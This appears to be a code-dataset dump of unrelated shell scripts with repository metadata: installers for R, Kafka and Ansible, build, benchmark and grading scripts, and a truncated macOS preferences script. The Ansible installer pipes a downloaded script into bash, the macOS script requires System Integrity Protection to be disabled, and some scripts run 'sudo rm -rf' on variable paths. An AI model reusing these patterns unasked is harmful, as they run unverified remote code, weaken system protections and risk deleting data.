blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
fe47a0070a9f9ad6b35de215dcdfc10c9cb6f4e6
|
Shell
|
fuzziebrain/docker-apex-stack
|
/oml-kit/installR.sh
|
UTF-8
| 584
| 2.71875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Run as root
CRAN_MIRROR_URL=${CRAN_MIRROR_URL:-https://cran.r-project.org}
R_HOME=/usr/lib64/R
yum-config-manager --enable ol7_optional_latest ol7_addons
yum install -y \
make \
automake \
gcc \
gcc-c++ \
pango-devel \
libXt-devel \
libpng12 \
unzip \
R-3.3.0-2.el7
rm -rf /var/cache/yum
mkdir /usr/share/doc/R-$(rpm -q R.x86_64 --queryformat '%{VERSION}')/html
cat << EOF > $R_HOME/etc/Rprofile.site
local({
r <- getOption("repos")
r["CRAN"] <- "${CRAN_MIRROR_URL}"
options(repos = r)
})
EOF
rm -rf /tmp/hsperfdata_root
| true
|
3b234e86b4f3c88240833b59321775948d1d1c47
|
Shell
|
simple-linux-tools/file-manipulation-scripts
|
/find-last-modified
|
UTF-8
| 202
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/bash
#
# USAGE: find-last-modified [<location>] [<number of last modified files>]
find ${1:-.} -type f 2> /dev/null| xargs stat --format '%Y :%y %n' | sort -nr | cut -d: -f2- | head -${2:-30}
| true
|
7b1745f3ea2503eb4749fded47a3ad04e004cbd6
|
Shell
|
samuel-messing/otto
|
/src/build_and_run.sh
|
UTF-8
| 3,187
| 4.03125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
# Builds entire project and runs the server.
# TODO - check that we're running in top-level dir.
# TODO - kill existing server first.
function install_command() {
if [[ ! $(command -v $1) ]]; then
echo "[one-time] Installing $1";
sudo apt-get install $2
fi
}
install_command 'clang-format' 'clang-format'
install_command 'protoc' 'protobuf-compiler'
install_command 'virtualenv' 'virtualenv'
function make_dir() {
if [[ ! -d $1 ]]; then
echo "[one-time] Creating local $1/ directory";
mkdir $1
fi
}
make_dir 'db'
make_dir 'logs'
readonly REPO_LOCATION="/home/pi/otto"
readonly ROOT="src"
readonly CONFIGS_ROOT="configs"
readonly DB_ROOT="db"
readonly GENFILES_ROOT="${ROOT}/genfiles"
readonly VIRTUALENV_ROOT="otto-env"
readonly CLEANING__________="Cleaning................."
readonly SOURCE_VIRTUALENV_="Sourcing virutalenv......"
readonly INSTALL_VIRTUALENV="Installing virtualenv...."
readonly FORMAT_PYTHON_____="Formatting python........"
readonly FORMAT_PROTOS_____="Formatting protos........"
readonly BUILD_PROTOS______="Building protos.........."
readonly START_SERVER______="Starting server.........."
readonly EXIT_VIRTUALENV___="Exiting virtualenv......."
readonly DONE="...done!"
# DEFAULTS ===========================================
readonly DEFAULT_CONFIG="${CONFIGS_ROOT}/p0_v5.pbtxt"
readonly DEFAULT_DB_PATH="${DB_ROOT}/otto.db"
readonly DEFAULT_LOGGING_CONFIG="${CONFIGS_ROOT}/p0_v0.logging.config"
# HACK: To install as a systemd service, ensure we're running in the repo.
pushd "${REPO_LOCATION}"
# CLEANING ===========================================
echo -n "${CLEANING__________}"
rm -f "${GENFILES_ROOT}/*"
rm -f "${ROOT}/*.pyc"
touch "${GENFILES_ROOT}/__init__.py"
echo "${DONE}"
# VIRTUALENV =========================================
if [ ! -d "${VIRTUALENV_ROOT}" ]; then
echo "No virtualenv found at ${VIRTUALENV_ROOT}!"
echo "${INSTALL_VIRTUALENV}"
virtualenv -p python3 otto-env
# activate is idempotent
. otto-env/bin/activate
pip install -r "${ROOT}/requirements.txt"
echo "${DONE}"
fi
function finish {
echo "Server killed!"
echo -n "${EXIT_VIRTUALENV___}"
deactivate
echo "${DONE}"
echo "\"This is Otto, signing off!\" ~ Otto"
}
trap finish EXIT
echo -n "${SOURCE_VIRTUALENV_}"
# activate is idempotent
. otto-env/bin/activate
#pip install -r "${ROOT}/requirements.txt"
echo "${DONE}"
# FORMATTING CODE ====================================
if [[ ! -z "$(git diff --name-only | grep .py)" ]]; then
echo -n "${FORMAT_PYTHON_____}"
autopep8 --in-place --recursive src/
echo "${DONE}"
fi
if [[ ! -z "$(git diff --name-only | grep .proto)" ]]; then
echo -n "${FORMAT_PROTOS_____}"
clang-format -i src/proto/*
echo "${DONE}"
fi
# BUILDING PROTOS ====================================
echo -n "${BUILD_PROTOS______}"
protoc -I="${ROOT}/proto/" \
--python_out="${ROOT}/genfiles/" \
${ROOT}/proto/*
echo "${DONE}"
# RUNNING SERVER =====================================
echo "${START_SERVER______}"
PYTHONPATH="${GENFILES_ROOT}" python3 ${ROOT}/app.py \
--config_file="${DEFAULT_CONFIG}" \
--db_file="${DEFAULT_DB_PATH}" \
--logging_config_file="${DEFAULT_LOGGING_CONFIG}"
| true
|
a110aa043ed2f0460aca8d141faf8454894f418f
|
Shell
|
CSenshi/Information-Theory-Checker
|
/HW3/script/check.sh
|
UTF-8
| 5,447
| 3.859375
| 4
|
[] |
no_license
|
# !/bin/bash
if [ "$#" -ne 8 ] && [ "$#" -ne 10 ] && [ "$#" -ne 12 ] && [ "$#" -ne 14 ] ; then
echo "Invalid Arguments"
echo "Usage: script requires 3-5 Arguments: "
echo " -s Path to folder which contains following scripts with exact names:"
echo " StandardForm.XXX, ParityCheck.XXX, DecodingTable.XXX, Encode.XXX Decode.xxx"
echo " -t Path to folder which contains public tests(where A,B,C,D folders are located)"
echo " -T Path to folder which contains test scriptis (i.e. test_C.py, test_d.py"
echo " -r Path to folder where we should put output for each test"
echo " -e Extension of your file (pass with dot exaple: .py)"
echo " -i Your Interpreter (If using executable)"
echo " -py Your Python Interpreter (Used to test C and D)"
echo "Example: /check.sh -s src/ -t public_tests/ -r res/ -e .py -i python3 -T script/"
exit
fi
# Read Command Line Arguments
POSITIONAL=()
while [[ $# -gt 0 ]]
do
key="$1"
case $key in
-s)
SCRIPT_FOLDER_PATH="$2"
shift # past argument
shift # past value
;;
-t)
TEST_FOLDER_PATH="$2"
shift # past argument
shift # past value
;;
-T)
TESTER_SCRIPT_FOLDER="$2"
shift # past argument
shift # past value
;;
-r)
RESULT_DIR_NAME="$2"
shift # past argument
shift # past value
;;
-e)
EXTENSION="$2"
shift # past argument
shift # past value
;;
-i)
INTERPRETER="$2"
shift # past argument
shift # past value
;;
-py3)
PYTHON3="$2"
shift # past argument
shift # past value
;;
*) # unknown option
POSITIONAL+=("$1") # save it in an array for later
shift # past argument
;;
esac
done
set -- "${POSITIONAL[@]}" # restore positional parameters
[ -z "$SCRIPT_FOLDER_PATH" ] && printf "Script Folder path shouldn't be empty (use -s) \nexiting...\n" && exit
echo "Script Folder path: $(pwd)/${SCRIPT_FOLDER_PATH}"
[ -z "$TEST_FOLDER_PATH" ] && printf "Test Folders path shouldn't be empty (use -t) \nexiting...\n" && exit
echo "Test Folders path: $(pwd)/${TEST_FOLDER_PATH}"
[ -z "$RESULT_DIR_NAME" ] && printf "Result Directory Path shouldn't be empty (use -s) \nexiting...\n" && exit
echo "Result Directory Path: $(pwd)/${RESULT_DIR_NAME}"
echo "Extension: ${EXTENSION}"
echo "Interpreter: ${INTERPRETER}"
# delete Result Dir if exists
if [ ! -d "${RESULT_DIR_NAME}" ]; then
mkdir ${RESULT_DIR_NAME}
fi
echo
echo "Starting Tests..."
UTILS='../utils'
run_test_compare(){
RUN_TEST="${UTILS}/run_test_compare.sh"
PROBLEM_NAME="$1"
PROGRAM_NAME="$2"
TEST_SUB_FOLDER="$3"
TOTAL_TEST="$4"
$RUN_TEST "${PROBLEM_NAME}" "${PROGRAM_NAME}" "${TEST_SUB_FOLDER}" "${TOTAL_TEST}" "${SCRIPT_FOLDER_PATH}" "${TEST_FOLDER_PATH}" "${RESULT_DIR_NAME}" "${INTERPRETER}"
}
run_test_with_checkers(){
RUN_TEST="${UTILS}/run_test_with_checkers.sh"
PROBLEM_NAME="$1"
PROGRAM_NAME="$2"
TEST_SUB_FOLDER="$3"
TOTAL_TEST="$4"
PYTHON_TEST="$5"
$RUN_TEST "${PROBLEM_NAME}" "${PROGRAM_NAME}" "${TEST_SUB_FOLDER}" "${TOTAL_TEST}" "${PYTHON_TEST}" "${SCRIPT_FOLDER_PATH}" "${TEST_FOLDER_PATH}" "${RESULT_DIR_NAME}" "${INTERPRETER}" "${TESTER_SCRIPT_FOLDER}" "${PYTHON3}"
}
run_test_compare_2args(){
RUN_TEST="${UTILS}/run_test_compare_2args.sh"
PROBLEM_NAME="$1"
PROGRAM_NAME="$2"
TEST_SUB_FOLDER="$3"
TOTAL_TEST="$4"
ARG1_FILE_EXTENSION="$5"
ARG2_FILE_EXTENSION="$6"
$RUN_TEST "${PROBLEM_NAME}" "${PROGRAM_NAME}" "${TEST_SUB_FOLDER}" "${TOTAL_TEST}" "${ARG1_FILE_EXTENSION}" "${ARG2_FILE_EXTENSION}" "${SCRIPT_FOLDER_PATH}" "${TEST_FOLDER_PATH}" "${RESULT_DIR_NAME}" "${INTERPRETER}"
}
run_test_without_compare(){
RUN_TEST="${UTILS}/run_test_without_compare.sh"
PROBLEM_NAME="$1"
PROGRAM_NAME="$2"
TEST_SUB_FOLDER="$3"
TOTAL_TEST="$4"
$RUN_TEST "${PROBLEM_NAME}" "${PROGRAM_NAME}" "${TEST_SUB_FOLDER}" "${TOTAL_TEST}" "${SCRIPT_FOLDER_PATH}" "${TEST_FOLDER_PATH}" "${RESULT_DIR_NAME}" "${INTERPRETER}"
}
run_test_with_2input(){
RUN_TEST="${UTILS}/run_test_with_2input.sh"
PROBLEM_NAME="$1"
PROGRAM_NAME="$2"
TEST_SUB_FOLDER="$3"
TOTAL_TEST="$4"
GENERATED_CODE_DIR_NAME="$5"
$RUN_TEST "${PROBLEM_NAME}" "${PROGRAM_NAME}" "${TEST_SUB_FOLDER}" "${TOTAL_TEST}" "${GENERATED_CODE_DIR_NAME}" "${SCRIPT_FOLDER_PATH}" "${TEST_FOLDER_PATH}" "${RESULT_DIR_NAME}" "${INTERPRETER}"
}
TEST_SUB_FOLD="C"
RES_DIR=${RESULT_DIR_NAME}/${TEST_SUB_FOLD}/
PROG_NAME="DecodingTable${EXTENSION}"
SCRIPT=${SCRIPT_FOLDER_PATH}/${PROG_NAME}
FNAME=${SCRIPT%.*}
FNAME=${FNAME##*/}
GENERATED_CODE_DIR_NAME=${RES_DIR}/${FNAME}_
run_test_with_checkers "StandardForm" "StandardForm${EXTENSION}" "A" 8 "test_A.py"
run_test_with_checkers "ParityCheck" "ParityCheck${EXTENSION}" "B" 8 "test_B.py"
run_test_compare_2args "Encode" "Encode${EXTENSION}" "D" 6 "code" "dat"
run_test_without_compare "DecodingTable" "DecodingTable${EXTENSION}" "C" 6
run_test_with_2input "Decode" "Decode${EXTENSION}" "E" 6 ${GENERATED_CODE_DIR_NAME}
| true
|
ba87b4cce91bd25efebd915e66ead9a082473784
|
Shell
|
weiyaom/BigDataGroupProjects
|
/Java_Kafka/installKafka.sh
|
UTF-8
| 403
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/sh
cd /opt
#Get Kafka
sudo wget http://apache.mirrors.hoobly.com/kafka/2.3.1/kafka_2.12-2.3.1.tgz
#Extract the file
sudo tar -xzvf kafka_2.12-2.3.1.tgz
#Remove zip file
sudo rm kafka_2.12-2.3.1.tgz
#Update the bash profile
echo -e '\n#Kafka Home' >> ~/.bash_profile
echo 'export KAFKA_HOME=/opt/kafka_2.12-2.3.1' >> ~/.bash_profile
echo 'export PATH=$PATH:$KAFKA_HOME/bin' >> ~/.bash_profile
| true
|
9de31959681931ba5e89636da1243c1b954766ca
|
Shell
|
jeanregisser/dotfiles
|
/bin/install-nodes
|
UTF-8
| 220
| 2.90625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env zsh
source "$(dirname "$0")/script-helpers"
msg "Install node.js versions"
NODES=(
'v6.9.1'
'v7.5.0'
'v8.2.1'
)
for item in "${NODES[@]}"
do
nvm install $item
done
#nvm alias default node
| true
|
61904f32a6b0d1c729fc6015a6e8856db8d5508c
|
Shell
|
l50/bash-scripts
|
/install_ansible.sh
|
UTF-8
| 7,280
| 3.640625
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# -----------------------------------------------------------------------------
# install_ansible.sh
#
# Install ansible
#
# Usage: bash install_ansible.sh
#
# Author: Jayson Grace, jayson.e.grace@gmail.com, 8/2/2017
#
# Resources:
# https://stackoverflow.com/questions/19622198/what-does-set-e-mean-in-a-bash-script/34381499
# http://binarynature.blogspot.com.au/2016/01/install-ansible-on-os-x-el-capitan_30.html
# http://ansible.pickle.io/post/86598332429/running-ansible-playbook-in-localhost
# https://unix.stackexchange.com/questions/306111/confused-about-operators-vs-vs-vs
# https://unix.stackexchange.com/questions/32210/single-or-double-brackets
# https://github.com/g0tmi1k/os-scripts/blob/master/kali-rolling.sh
# ----------------------------------------------------------------------------
# Stop execution of script if an error occurs
set -e
os=''
ansible_directory='/etc/ansible'
ansible_config_file="$ansible_directory/ansible.cfg"
ansible_hosts="$ansible_directory/hosts"
global_roles="$ansible_directory/roles"
ansible_workspace="$HOME/.ansible/Workspace"
pyenv_installed=true
python_version='3.6.5'
##### (Cosmetic) Color output
RED="\033[01;31m" # Issues/Errors
GREEN="\033[01;32m" # Success
BLUE="\033[01;34m" # Heading
RESET="\033[00m" # Normal
install_apt_deps()
{
echo -e "${BLUE}Making sure all apt dependencies are in place, please wait...${RESET}"
sudo apt update
sudo DEBIAN_FRONTEND=noninteractive apt install -y git build-essential libssl-dev libbz2-dev make zlib1g-dev \
libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev \
tk-dev xz-utils
}
installPyenvDeps()
{
if [[ `uname` != 'Darwin' ]]; then
os=`cat /etc/os-release | perl -n -e'while(/^ID=(.*)/g) {print "$1\n"}'`
if [[ $os == 'ubuntu' || $os == 'kali' ]]; then
install_apt_deps
fi
fi
}
setDotfileParams()
{
dotfile=''
if [[ $(echo $SHELL) == '/bin/bash' ]]; then
dotfile="$HOME/.bash_profile"
echo "source $HOME/.bash_profile" >> "$HOME/.bashrc"
if [[ ! -f $dotfile ]]; then
touch $dotfile
fi
elif [[ $(echo $SHELL) == '/bin/zsh' ]]; then
dotfile="$HOME/.zshrc"
else
echo 'Unsupported shell detected, please use bash or zsh.'
fi
if [[ ! $dotfile == '' ]]; then
if ! grep -Fxq 'export PATH=$PATH:$HOME/.pyenv/bin' "$dotfile"; then
echo -e "${BLUE}${dotfile} does not have pyenv vars, setting it up...${RESET}"
echo 'export PATH=$PATH:$HOME/.pyenv/bin' >> $dotfile
echo 'eval "$(pyenv init -)"' >> $dotfile
echo 'eval "$(pyenv virtualenv-init -)"' >> $dotfile
fi
fi
}
install_pyenv()
{
installPyenvDeps
if [[ ! -d $HOME/.pyenv ]]; then
pyenv_installed=false
echo -e "${BLUE}Installing pyenv, please wait...${RESET}"
curl https://raw.githubusercontent.com/pyenv/pyenv-installer/master/bin/pyenv-installer | bash
setDotfileParams
else
echo -e "${GREEN}pyenv has already been installed, moving on...${RESET}"
fi
}
install_python()
{
echo -e "${BLUE}Installing python ${python_version} and setting it globally using pyenv, please wait...${RESET}"
if [[ ! -f $HOME/.pyenv/versions/$python_version/bin/python ]]; then
$HOME/.pyenv/bin/pyenv install $python_version
$HOME/.pyenv/bin/pyenv global $python_version
else
echo -e "${GREEN}Python version ${python_version} has already been installed, moving on...${RESET}"
fi
if [[ ! -f /usr/bin/python ]]; then
# Symlink to fix issues with ansible
sudo ln -s $HOME/.pyenv/versions/$python_version/bin/python /usr/bin/python
fi
}
get_pip()
{
if [[ $pyenv_installed == false ]]; then
echo -e "${BLUE}Installing pip, please wait...${RESET}"
$HOME/.pyenv/shims/easy_install pip
fi
echo -e "${BLUE}Making sure we are using the latest version of pip, please wait...${RESET}"
$HOME/.pyenv/versions/$python_version/bin/pip install --upgrade pip
}
install_ansible()
{
echo -e "${BLUE}Installing ansible, please wait...${RESET}"
$HOME/.pyenv/versions/$python_version/bin/pip install ansible
}
create_ansible_directory()
{
if [[ ! -d $ansible_directory ]]; then
sudo mkdir $ansible_directory
# This will not work on docker by default because $USER is not defined - you need to define it as an ENV var
sudo chown $USER $ansible_directory
else
echo -e "${GREEN}Ansible directory already created, moving on...${RESET}"
fi
}
get_ansible_config_file()
{
if [[ ! -f $ansible_config_file ]]; then
echo 'getting config file'
curl https://raw.githubusercontent.com/ansible/ansible/devel/examples/ansible.cfg\
-o $ansible_config_file
sudo bash -c "echo ansible_python_interpreter = $HOME/.pyenv/versions/$python_version/bin/python >> $ansible_config_file"
else
echo -e "${GREEN}Ansible config file already created, moving on...${RESET}"
fi
}
modify_ansible_config_file()
{
if [[ -f $ansible_config_file ]]; then
echo 'Adding logging to ansible config file'
sed -i".old" 's/#log_path = \/var\/log\/ansible.log/log_path = \/var\/log\/ansible.log/' $ansible_config_file
else
echo -e "${RED}Unable to find ansible config file to modify, moving on...${RESET}"
fi
}
create_host_file()
{
if [[ ! -f $ansible_hosts ]]; then
sudo touch $ansible_hosts
# Run playbooks locally
echo "localhost ansible_connection=local" | sudo tee $ansible_hosts
fi
}
check_ansible_installed()
{
if $HOME/.pyenv/versions/${python_version}/bin/ansible localhost -m ping > /dev/null; then
echo -e "${GREEN}Ansible was successfully installed!${RESET}"
else
echo -e "${RED}There was an issue installing ansible.${RESET}"
fi
}
create_ansible_workspace()
{
if [[ ! -d $ansible_workspace ]]; then
echo -e "${BLUE}Creating ansible workspace at $ansible_workspace ${RESET}"
mkdir -p $ansible_workspace
else
echo -e "${GREEN}Ansible workspace already created, moving on...${RESET}"
fi
}
create_global_roles()
{
if [[ ! -d $global_roles ]]; then
echo -e "${BLUE}Creating global ansible roles directory${RESET}"
sudo mkdir $global_roles
sudo chown -R root $ansible_directory
if [[ $os == 'ubuntu' ]]; then
sudo chgrp -R root $ansible_directory
fi
else
echo -e "${GREEN}Global Ansible roles directory already created, moving on...${RESET}"
fi
}
setup_ansible_symlinks()
{
ansible_bins=('ansible' 'ansible-connection' 'ansible-console' 'ansible-doc' 'ansible-galaxy' 'ansible-playbook' 'ansible-pull' 'ansible-vault')
# If there's already an ansible in place, remove it
if [[ -f /usr/local/bin/ansible ]]; then
sudo rm -rf /usr/local/bin/ansible
fi
for ((i=0; i<${#ansible_bins[*]}; i++)); do
echo -e "${BLUE}Creating ${ansible_bins[i]} symlink${RESET}"
sudo ln -s $HOME/.pyenv/versions/${python_version}/bin/${ansible_bins[i]} /usr/local/bin/${ansible_bins[i]}
done
}
create_log_file()
{
echo -e "${BLUE}Creating log file at /var/log/ansible.log${RESET}"
sudo touch /var/log/ansible.log
sudo chmod 644 /var/log/ansible.log
}
install_pyenv
install_python
get_pip
install_ansible
create_ansible_directory
get_ansible_config_file
modify_ansible_config_file
create_host_file
check_ansible_installed
create_ansible_workspace
create_global_roles
setup_ansible_symlinks
create_log_file
| true
|
e83acf4553bd7e12bc30eef73c4f51d3fa07af0a
|
Shell
|
rohankadekodi/SplitFS
|
/scripts/ycsb/run_ycsb_soft.sh
|
UTF-8
| 715
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
src_dir=`readlink -f ../../`
cur_dir=`readlink -f ./`
setup_dir=`readlink -f ../configs`
pmem_dir=/mnt/pmem_emul
run_ycsb()
{
fs=$1
for run in 1
do
sudo rm -rf $pmem_dir/*
sudo taskset -c 0-7 ./run_fs_soft.sh LoadA $fs $run
sleep 5
sudo taskset -c 0-7 ./run_fs_soft.sh RunA $fs $run
sleep 5
done
}
sudo $setup_dir/dax_config.sh
run_ycsb dax
sudo $setup_dir/nova_relaxed_config.sh
run_ycsb relaxed_nova
sudo $setup_dir/pmfs_config.sh
run_ycsb pmfs
sudo $setup_dir/nova_config.sh
run_ycsb nova
sudo $setup_dir/dax_config.sh
run_ycsb boost
sudo $setup_dir/dax_config.sh
run_ycsb sync_boost
sudo $setup_dir/dax_config.sh
run_ycsb posix_boost
| true
|
582a050864181545603f79f47d0eddac14f9448e
|
Shell
|
skyformat99/quant
|
/notebook.sh
|
UTF-8
| 317
| 3.265625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
#!/usr/bin/env bash
BASEDIR=`dirname $0`
cd "$BASEDIR"
if [[ ! -d research ]];then
mkdir research
fi
if [ `ps aux | grep jupyter | wc -l` -gt 1 ];then
echo "the notebook is already running,stop it first"
exit
fi
#启动notebook
nohup jupyter notebook --ip 0.0.0.0 > logs/notebook.log &
| true
|
272544631c401c74784f7bc0b64972cf29ea8a57
|
Shell
|
Irkka/squire
|
/lib/squire/ui/cli/usage.sh
|
UTF-8
| 300
| 2.921875
| 3
|
[] |
no_license
|
require_relative '../../meta.sh'
function squire_usage() {
squire_version
cat <<USAGE
# To locate squire installation and load it up
eval \$(squire init)
# To install or uninstall local or global libraries
squire <install (-g)|uninstall (-g)>
USAGE
return 1
}
export -f squire_usage
| true
|
72c928800b5a5b07faa1a63b8571aa0872a7c92a
|
Shell
|
jwermuth/docker-mongo-cluster
|
/resolveips.sh
|
UTF-8
| 767
| 3.5
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
pipework also great, but If you can use hostname other than ip then you can try this script
#!/bin/bash
# This function will list all ip of running containers
function listip {
for vm in `docker ps|tail -n +2|awk '{print $NF}'`;
do
ip=`docker inspect --format '{{ .NetworkSettings.IPAddress }}' $vm`;
echo "$ip $vm";
done
}
# This function will copy hosts file to all running container /etc/hosts
function updateip {
for vm in `docker ps|tail -n +2|awk '{print $NF}'`;
do
echo "copy hosts file to $vm";
docker exec -i $vm sh -c 'cat > /etc/hosts' < /tmp/hosts
done
}
listip
#listip > /tmp/hosts
#updateip
| true
|
d2181b7c745e140d3fe77d8e57dc65648e964d2a
|
Shell
|
emersion/confiture.utils
|
/massctl.sh
|
UTF-8
| 2,995
| 3.921875
| 4
|
[] |
no_license
|
#!/bin/bash
# Dependencies : -
APP_VERSION='0.1'
APP_AUTHOR='$imon'
collectChanges=false
collectChangesNoConfirm=false
generatePkgs=false
addPkgsToRepo=false
while test $# -gt 0
do
if [ "$1" = '--help' ] || [ "$1" = '-h' ] ; then
echo "=== Lighp package mass controller ==="
echo " version $APP_VERSION "
echo " written by $APP_AUTHOR "
echo ""
echo "Usage : ./massctl.sh [--repository REPO_PATH] [--base-dir BASE_DIR] [--lighp-path LIGHP_PATH] [--collect-changes] [--collect-noconfirm] [--generate] [--add-to-repo]"
echo "Usage : ./massctl.sh [-r REPO_PATH] [-b BASE_DIR] [--l LIGHP_PATH] [-C] [-G] [-A]"
echo "BASE_DIR: by default, current directory"
echo "LIGHP_PATH: by default, none"
exit
fi
if [ "$1" = '--base-dir' ] || [ "$1" = '-b' ] ; then
shift
rootPath=$(readlink -f "$1")
fi
if [ "$1" = '--repository' ] || [ "$1" = '-r' ] ; then
shift
repoPath=$(readlink -f "$1")
fi
if [ "$1" = '--lighp-path' ] || [ "$1" = '-l' ] ; then
shift
lighpPath=$(readlink -f "$1")
fi
if [ "$1" = '--collect-changes' ] || [ "$1" = '-C' ] ; then
collectChanges=true
fi
if [ "$1" = '--collect-noconfirm' ] ; then
collectChangesNoConfirm=true
fi
if [ "$1" = '--generate' ] || [ "$1" = '-G' ] ; then
generatePkgs=true
fi
if [ "$1" = '--add-to-repo' ] || [ "$1" = '-A' ] ; then
addPkgsToRepo=true
fi
shift
done
if [ -z "$rootPath" ] ; then
rootPath=`pwd`
fi
pkgFolders=( $(ls "$rootPath") )
if [ $collectChanges = true ] ; then
if [ -z "$lighpPath" ] ; then
read -p "Lighp's path : " lighpPath
fi
if [ ! -d "$lighpPath" ] ; then
echo "Lighp dir \"$lighpPath\" doesn't exists."
exit
fi
for pkgName in ${pkgFolders[@]}
do
if [ ! -d "$pkgName" ] ; then
continue
fi
pkgDir="$rootPath/$pkgName"
if [ ! -d "$pkgDir/src" ] ; then
continue
fi
echo "Collecting changes for package in folder \"$pkgDir\"..."
args="--input \"$pkgDir\" --lighp-path \"$lighpPath\""
if [ $collectChangesNoConfirm = true ] ; then
args="$args --yes"
fi
eval "./changescollector.sh $args"
done
fi
if [ $generatePkgs = true ] ; then
for pkgName in ${pkgFolders[@]}
do
if [ ! -d "$pkgName" ] ; then
continue
fi
pkgDir="$rootPath/$pkgName"
if [ ! -d "$pkgDir/src" ] ; then
continue
fi
echo "Generating package in folder \"$pkgDir\"..."
./generatepkg.sh --name "$pkgName" --input "$pkgDir" --output "$pkgDir"
done
fi
if [ $addPkgsToRepo = true ] ; then
if [ -z "$repoPath" ] ; then
read -p "Repository's path : " repoPath
fi
if [ ! -d "$repoPath" ] ; then
echo "Repo \"$repoPath\" doesn't exists."
exit
fi
for pkgFolder in ${pkgFolders[@]}
do
if [ ! -d "$pkgFolder" ] ; then
continue
fi
pkgMetadataPath="$rootPath/$pkgFolder/metadata.json"
if [ ! -f "$pkgMetadataPath" ] ; then
continue
fi
echo "Adding package in folder \"$pkgFolder\"..."
./repoctl.sh --repository "$repoPath" --add-pkg "$rootPath/$pkgFolder"
done
fi
echo "Done."
| true
|
60cf6b4b0efcc76a66922a727109bd51595afd15
|
Shell
|
ElsevierSoftwareX/SOFTX_2018_97
|
/setup/setup_env_2.7.sh
|
UTF-8
| 967
| 3.578125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Must run this script from SimPrily
# Tested on Ubuntu 16.04
echo "This will set up a python virtual environment with python 2.7 and include all the required packages for SimPrily."
echo "This script requires sudo privileges and apt-get.
If you do not have sudo privileges or cannot install apt-get see the SimPrily documentation for other options.
http://simprily.readthedocs.io/en/latest/install.html#environment-set-up"
sleep 5
set -e # quits at first error
cd ..
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install python-virtualenv git python-dev
sudo easy_install -U distribute
virtualenv simprily_env
source simprily_env/bin/activate
cd SimPrily
pip install --upgrade pip
pip install pip-tools
pip-sync
echo ""
echo "###################################"
echo ""
echo "Finished installing"
echo "SimPrily should be run like this:"
echo "simprily_env/bin/python simprily.py"
echo ""
simprily_env/bin/python simprily.py --help
| true
|
407af14f1caae014a34438ff4158932aa6eee575
|
Shell
|
blackwut/dotfiles
|
/preferences.sh
|
UTF-8
| 30,480
| 2.859375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
if csrutil status | grep -q enabled; then
echo "Please disable System Integrity Protection (SIP) by following sleepimage.sh script description."
exit
fi
if command -v dockutil; then
echo "Please install dockutil"
exit
fi
# Close any open System Preferences panes, to prevent them from overriding
# settings we’re about to change
osascript -e 'tell application "System Preferences" to quit'
# Ask for the administrator password upfront
sudo -v
# Keep-alive: update existing `sudo` time stamp until the script has finished
while true; do sudo -n true; sleep 60; kill -0 "$$" || exit; done 2>/dev/null &
###############################################################################
# General UI/UX #
###############################################################################
# Set computer name (as done via System Preferences -> Sharing)
sudo scutil --set ComputerName "BlackwutMac"
sudo scutil --set HostName "Blackwut"
sudo scutil --set LocalHostName "Blackwut"
sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.smb.server NetBIOSName -string "Blackwut"
# Set sidebar icon size to small
defaults write NSGlobalDomain NSTableViewDefaultSizeMode -int 1
# Increase window resize speed for Cocoa applications
defaults write NSGlobalDomain NSWindowResizeTime -float 0.001
# Expand save panel by default
defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode -bool true
defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode2 -bool true
# Expand print panel by default
defaults write NSGlobalDomain PMPrintingExpandedStateForPrint -bool true
defaults write NSGlobalDomain PMPrintingExpandedStateForPrint2 -bool true
# Automatically quit printer app once the print jobs complete
defaults write com.apple.print.PrintingPrefs "Quit When Finished" -bool true
# Save to disk (not to iCloud) by default
defaults write NSGlobalDomain NSDocumentSaveNewDocumentsToCloud -bool false
# Remove duplicates in the “Open With” menu (also see `lscleanup` alias)
/System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -kill -r -domain local -domain system -domain user #
# Enable subpixel font rendering on non-Apple LCDs
defaults write NSGlobalDomain AppleFontSmoothing -int 2
# Disable Resume system-wide
defaults write com.apple.systempreferences NSQuitAlwaysKeepsWindows -bool false
# Increase sound quality for Bluetooth headphones/headsets
defaults write com.apple.BluetoothAudioAgent "Apple Bitpool Min (editable)" -int 40
# Set Help Viewer windows to non-floating mode
defaults write com.apple.helpviewer DevMode -bool true
# Turn Bluetooth off.
sudo defaults write /Library/Preferences/com.apple.Bluetooth ControllerPowerState -int 0
# Disable the system alert sound
defaults write NSGlobalDomain com.apple.sound.beep.volume -int 0
defaults write NSGlobalDomain com.apple.sound.uiaudio.enabled -int 0
# Enable volume change feedback
defaults write NSGlobalDomain com.apple.sound.beep.feedback -bool true
# Show battery percentage
defaults write com.apple.menuextra.battery ShowPercent -bool true
# Show menu extras
defaults write com.apple.systemuiserver menuExtras -array \
"/System/Library/CoreServices/Menu Extras/AirPort.menu" \
"/System/Library/CoreServices/Menu Extras/Clock.menu" \
"/System/Library/CoreServices/Menu Extras/Battery.menu"
# Setup the menu bar date format
defaults write com.apple.menuextra.clock DateFormat -string "EEE d MMM HH:mm:ss"
# Flash the : in the menu bar
defaults write com.apple.menuextra.clock FlashDateSeparators -bool false
# 24 hour time
defaults write NSGlobalDomain AppleICUForce24HourTime -bool true
# Shows ethernet connected computers in airdrop
defaults write com.apple.NetworkBrowser BrowseAllInterfaces -bool true
# Show all processes in Activity Monitor
